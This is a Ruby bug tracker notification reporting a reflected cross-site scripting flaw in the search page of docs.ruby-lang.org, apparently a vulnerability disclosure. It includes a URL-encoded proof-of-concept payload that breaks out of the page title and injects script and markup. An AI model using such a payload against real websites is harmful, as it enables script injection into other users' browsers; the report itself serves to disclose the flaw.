From: hamitcibo4@...
Date: 2018-01-24T09:11:36+00:00
Subject: [ruby-core:85046] [Ruby trunk Bug#14389] Reflected XSS

Issue #14389 has been reported by TheGirdap (Hamit Cibo).

----------------------------------------
Bug #14389: Reflected XSS
https://bugs.ruby-lang.org/issues/14389

* Author: TheGirdap (Hamit Cibo)
* Status: Open
* Priority: Normal
* Assignee:
* Target version:
* ruby -v:
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN, 2.5: UNKNOWN
----------------------------------------
Hello,

Reflected XSS found.

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

result ; ss:

search: search box > ....import+words+payload => reflected XSS

https://twitter.com/hamit_cibo

---Files--------------------------------
Ekran_Resmi_2018-01-24_01.09.36 (1).png (187 KB)